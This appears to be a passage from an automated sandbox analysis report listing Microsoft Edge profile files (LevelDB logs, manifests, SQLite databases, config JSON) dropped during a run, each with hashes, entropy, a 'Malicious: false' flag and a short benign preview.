Preview:	...m.................DB_VERSION.1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	307
Entropy (8bit):	5.299247624317793
Encrypted:	false
SSDEEP:	6:iOrvR1TzM1CHhJ23oH+Tcwtp3hBtB2KLl5vR1dpUTMq2PCHhJ23oH+Tcwtp3hBWq:7DTzAYebp3dFLf7XvBYebp3eFUv
MD5:	6D5A44F27B56BFCCFC410468E7E8B5D8
SHA1:	6945BF3FC8116E6C331CE55C9188085135F53FE2
SHA-256:	10DD6666200EFB899A6F9A849559AA9D8972FBC4DB1AFA94D2967CD7602CAA29
SHA-512:	9BFEA5EE8C2C9F79CF6D57C9EF914E32884DBD64855BF123F7EF32A0B8BA8204EFD65A3EB3E1817A222C501B019EA5EC3A40ADB3DD7F2B30FF1082CA2605303F
Malicious:	false
Preview:	2025/01/09-08:42:33.671 164 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/09-08:42:33.840 164 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	81875
Entropy (8bit):	6.081777779239688
Encrypted:	false
SSDEEP:	1536:hQ60h81vrPI3lFdSn1EItRjRzkGJTPILJkkcq5OQxj:hKS15tRdAYDI1JcYxj
MD5:	218D1A8EB0E2B169D856698D082FF182
SHA1:	9C7398E2951DA5BA8D808EDD32A6EBF643F09426
SHA-256:	9F0D6CEA1CCFFCF94976E1CBA83BB6235770878920F754F4224976BEA514A59F
SHA-512:	8EB9976A71EC27C505C72BAD36983DAD51B5B818280E791FAB7D0511F97E5FB33987B5F9F6738E7904F5A366DF781825236865AD3BFC28B221A8BC21E177D311
Malicious:	false
Preview:	...m.................DB_VERSION.1.Go..................QUERY_TIMESTAMP:arbitration_priority_list4...13340967444415546.$QUERY:arbitration_priority_list4....[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.177077819304061
Encrypted:	false
SSDEEP:	6:iOrvR1Aq2PCHhJ23oH+Tcwt9Eh1tIFUtJvR1l2a3JZmwPvR1pav3DkwOCHhJ23of:7DAvBYeb9Eh16FUt1B3J/f0v3D56YebY
MD5:	45B56CECA3A3892BC55F5E3BC6995CB2
SHA1:	B36A396A1FE352C85C7CCEAA13C7693BB469CDD2
SHA-256:	272AA40BD9AE3F1FB6E2519866CA5131AAE7CEA85235EE1A41EF3FB8F0278C74
SHA-512:	233ADF91D2D6695F08B021ED4AAD3BB04E0AA5475C1D73F6DE47464531A5E20C2ECE1574E10EFC03AB77F866ECAADB1BA52F0DC028853AE63374BB9B28E8E63B
Malicious:	false
Preview:	2025/01/09-08:42:33.726 fc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:42:33.737 fc0 Recovering log #3.2025/01/09-08:42:33.745 fc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	333
Entropy (8bit):	5.177077819304061
Encrypted:	false
SSDEEP:	6:iOrvR1Aq2PCHhJ23oH+Tcwt9Eh1tIFUtJvR1l2a3JZmwPvR1pav3DkwOCHhJ23of:7DAvBYeb9Eh16FUt1B3J/f0v3D56YebY
MD5:	45B56CECA3A3892BC55F5E3BC6995CB2
SHA1:	B36A396A1FE352C85C7CCEAA13C7693BB469CDD2
SHA-256:	272AA40BD9AE3F1FB6E2519866CA5131AAE7CEA85235EE1A41EF3FB8F0278C74
SHA-512:	233ADF91D2D6695F08B021ED4AAD3BB04E0AA5475C1D73F6DE47464531A5E20C2ECE1574E10EFC03AB77F866ECAADB1BA52F0DC028853AE63374BB9B28E8E63B
Malicious:	false
Preview:	2025/01/09-08:42:33.726 fc0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/09-08:42:33.737 fc0 Recovering log #3.2025/01/09-08:42:33.745 fc0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.46228442315203316
Encrypted:	false
SSDEEP:	24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu6lKcq:TouQq3qh7z3bY2LNW9WMcUvBu6Qcq
MD5:	21BF923FA20D2324D60915F333F8FF31
SHA1:	05CA72AA756503214DB2341DFE968A5C839ABC3D
SHA-256:	FF593911B057447F9451F7B542E915A475E2CDE3C00ED5E56007FC8741B6F33F
SHA-512:	F2F4B80369DDE21075E90CF0059FEE2C8FA7DED82F231E45AED8D31692AE02E06C09778BE8C519C600720C4CB56E872FABF62C4DAFCCFDB5FE4D8509A64AC56B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	0.8708334089814068
Encrypted:	false
SSDEEP:	12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
MD5:	92F9F7F28AB4823C874D79EDF2F582DE
SHA1:	2D4F1B04C314C79D76B7FF3F50056ECA517C338B
SHA-256:	6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
SHA-512:	86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.231138964091887
Encrypted:	false
SSDEEP:	6:iOrvRKOuGV34q2PCHhJ23oH+TcwtnG2tMsIFUtJvRKcJdJZmwPvRKcJdDkwOCHh4:7hJevBYebn9GFUtnn/t156Yebn95J
MD5:	1D3CD41BD64870E7A6473318372227DF
SHA1:	BCCCEB3C699C4EAC99046CB8E4ECC1DFBB80AD54
SHA-256:	9E126354B5B18F84329AB57B2D8357B9A38F2C77E6F5CD66E64C9EF8DC8B5CD9
SHA-512:	56AFAC61E8B8CF08A39069C452F26ED5F05BCAE39602D8650AFDEF2808F40F453F19A2FB892F741E48EE85B3E50918D5160D4F857089007CE104E6F91B414851
Malicious:	false
Preview:	2025/01/09-08:42:27.825 1c80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:42:27.841 1c80 Recovering log #3.2025/01/09-08:42:27.841 1c80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	348
Entropy (8bit):	5.231138964091887
Encrypted:	false
SSDEEP:	6:iOrvRKOuGV34q2PCHhJ23oH+TcwtnG2tMsIFUtJvRKcJdJZmwPvRKcJdDkwOCHh4:7hJevBYebn9GFUtnn/t156Yebn95J
MD5:	1D3CD41BD64870E7A6473318372227DF
SHA1:	BCCCEB3C699C4EAC99046CB8E4ECC1DFBB80AD54
SHA-256:	9E126354B5B18F84329AB57B2D8357B9A38F2C77E6F5CD66E64C9EF8DC8B5CD9
SHA-512:	56AFAC61E8B8CF08A39069C452F26ED5F05BCAE39602D8650AFDEF2808F40F453F19A2FB892F741E48EE85B3E50918D5160D4F857089007CE104E6F91B414851
Malicious:	false
Preview:	2025/01/09-08:42:27.825 1c80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2025/01/09-08:42:27.841 1c80 Recovering log #3.2025/01/09-08:42:27.841 1c80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	375520
Entropy (8bit):	5.3540867779429755
Encrypted:	false
SSDEEP:	6144:IA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:IFdMyq49tEndBuHltBfdK5WNbsVEziPU
MD5:	96B8AF4A2A0DC55775EBB285FCF08CD0
SHA1:	3C17F63B086C2B6AC2D8DEDBCED4F173DD3F7BE2
SHA-256:	F04574EF3451C252DBF68B5CECD163C2AA0D486E69C4E891D84439C7B489B8BD
SHA-512:	30E9FF6594F3574F26CF787C3D0450D4A8D5164530ED5C8A8FF2E7727B70606D3D5DD61E3C76FE35DC30C207870D7914BE605A218A2AFACE8985A5E515BE6109
Malicious:	false
Preview:	...m.................DB_VERSION.1^.hIq...............&QUERY_TIMESTAMP:domains_config_gz2...13380903756087959..QUERY:domains_config_gz2....[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	309
Entropy (8bit):	5.220549814024023
Encrypted:	false
SSDEEP:	6:iOrvR1vAuM1CHhJ23oH+Tcwtk2WwnvB2KLl5vR1K4q2PCHhJ23oH+Tcwtk2Wwnvh:7DvAuAYebkxwnvFLfK4vBYebkxwnQFUv
MD5:	B2AADEE4AD39A3C8D2ED68FB09571BDB
SHA1:	0B12E46C648E98B776053F73D32DA7E37B3B0FED
SHA-256:	AF33C0F0735583E2790DEDCA6259FA6C02C7AAEE55A2FF4A783E43D20D80D6B8
SHA-512:	908B319413C9DDCEB47E6345E66BC59DA23DB2204BB664758690444F78BE4E8EF2792C6E89CE956FEBD69284CDBB6C9B468A3696530D6B677E5E3C50DA3DD873
Malicious:	false
Preview:	2025/01/09-08:42:33.786 394 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-08:42:33.900 394 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	358860
Entropy (8bit):	5.32460509422579
Encrypted:	false
SSDEEP:	6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RM:C1gAg1zfv0
MD5:	984AD69E3730E7926681A473D8EC0A7A
SHA1:	E0C12D25974072F7B39AF3F9ED264A437F7DF975
SHA-256:	A38A29A9AE7F5C637EE1F02AC4D508F9B5CC99D408D4B0656D193AB6ABD107E5
SHA-512:	5BACD5FD9BB658AAE4A843B4E308A09959A8C24917FAD1AB12552DDBE057FE1F8F0D426BB235DE9996272D77CF3858387213DB44D665E29B41B65BFB3FCAAF01
Malicious:	false
Preview:	{"aee_config":{"ar":{"price_regex":{"ae":"(((ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(ae\|aed\|\\x{062F}\\x{0660}\\x{0625}\\x{0660}\|\\x{062F}\\.\\x{0625}\|dhs\|dh)))","dz":"(((dzd\|da\|\\x{062F}\\x{062C})\\s\\d{1,3})\|(\\d{1,3}\\s(dzd\|da\|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}\|egp)\\s\\d{1,3})\|(\\d{1,3}\\s(e\\x{00a3}\|egp)))","ma":"(((mad\|dhs\|dh)\\s\\d{1,3})\|(\\d{1,3}\\s(mad\|dhs\|dh)))","sa":"((\\d{1,3}\\s(sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633}))\|((sar\\s\\x{fdfc}\|sar\|sr\|\\x{fdfc}\|\\.\\x{0631}\\.\\x{0633})\\s\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})\|(\\x{0623}\\x{0636}\\x{0641}\\s\\x{0625}\\x{0644}\\x{0649}\\s\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})\|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})\|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.2144858730562955
Encrypted:	false
SSDEEP:	6:iOrvRKZW+q2PCHhJ23oH+Tcwt8aPrqIFUtJvRKCZZmwPvRKOuGeNVkwOCHhJ23oD:78XvBYebL3FUtx/lJez56YebQJ
MD5:	0394F001886BCCA21C2F083D194E11A9
SHA1:	587105DB92F0142CC3222F80B7FA648FC022FA59
SHA-256:	249F80E3418F1E8267B3A663C71FF0A93EFBBFA29905760019BC1F71A70485CA
SHA-512:	79CAA69C141D65CA9C72C559285C0293572F4E98988FB6F7845A7CF35551C513D0BAFB61C2E633A33B055FF992683AB46CBC211ECF22DF3E27BF7B13A6032524
Malicious:	false
Preview:	2025/01/09-08:42:27.819 1cc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:42:27.822 1cc8 Recovering log #3.2025/01/09-08:42:27.825 1cc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.2144858730562955
Encrypted:	false
SSDEEP:	6:iOrvRKZW+q2PCHhJ23oH+Tcwt8aPrqIFUtJvRKCZZmwPvRKOuGeNVkwOCHhJ23oD:78XvBYebL3FUtx/lJez56YebQJ
MD5:	0394F001886BCCA21C2F083D194E11A9
SHA1:	587105DB92F0142CC3222F80B7FA648FC022FA59
SHA-256:	249F80E3418F1E8267B3A663C71FF0A93EFBBFA29905760019BC1F71A70485CA
SHA-512:	79CAA69C141D65CA9C72C559285C0293572F4E98988FB6F7845A7CF35551C513D0BAFB61C2E633A33B055FF992683AB46CBC211ECF22DF3E27BF7B13A6032524
Malicious:	false
Preview:	2025/01/09-08:42:27.819 1cc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:42:27.822 1cc8 Recovering log #3.2025/01/09-08:42:27.825 1cc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.233100951445024
Encrypted:	false
SSDEEP:	6:iOrvRKG3+q2PCHhJ23oH+Tcwt865IFUtJvRK85ZmwPvRK8tVkwOCHhJ23oH+Tcwx:7yvBYeb/WFUtN5/zT56Yeb/+SJ
MD5:	A5BE93E46746EC729CB2651DBD89F755
SHA1:	0A9D3AA4C9F084A097AC8B180484F7C073801309
SHA-256:	6EDF2FE908C83A927BAFAC0DB6B5E8D792A87738CD7AACAC973A4D56BE9CAEA4
SHA-512:	67A3EA5AA758C0B69072B1DC6FD45629F8D8C09E6BC2487B62FBE501CBF1A8EC3F87EAC573B26503941D68350D2A14AB4EDF0AE493189B0CBF073B5FC932BFF8
Malicious:	false
Preview:	2025/01/09-08:42:27.831 1cc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:42:27.833 1cc8 Recovering log #3.2025/01/09-08:42:27.833 1cc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.233100951445024
Encrypted:	false
SSDEEP:	6:iOrvRKG3+q2PCHhJ23oH+Tcwt865IFUtJvRK85ZmwPvRK8tVkwOCHhJ23oH+Tcwx:7yvBYeb/WFUtN5/zT56Yeb/+SJ
MD5:	A5BE93E46746EC729CB2651DBD89F755
SHA1:	0A9D3AA4C9F084A097AC8B180484F7C073801309
SHA-256:	6EDF2FE908C83A927BAFAC0DB6B5E8D792A87738CD7AACAC973A4D56BE9CAEA4
SHA-512:	67A3EA5AA758C0B69072B1DC6FD45629F8D8C09E6BC2487B62FBE501CBF1A8EC3F87EAC573B26503941D68350D2A14AB4EDF0AE493189B0CBF073B5FC932BFF8
Malicious:	false
Preview:	2025/01/09-08:42:27.831 1cc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:42:27.833 1cc8 Recovering log #3.2025/01/09-08:42:27.833 1cc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

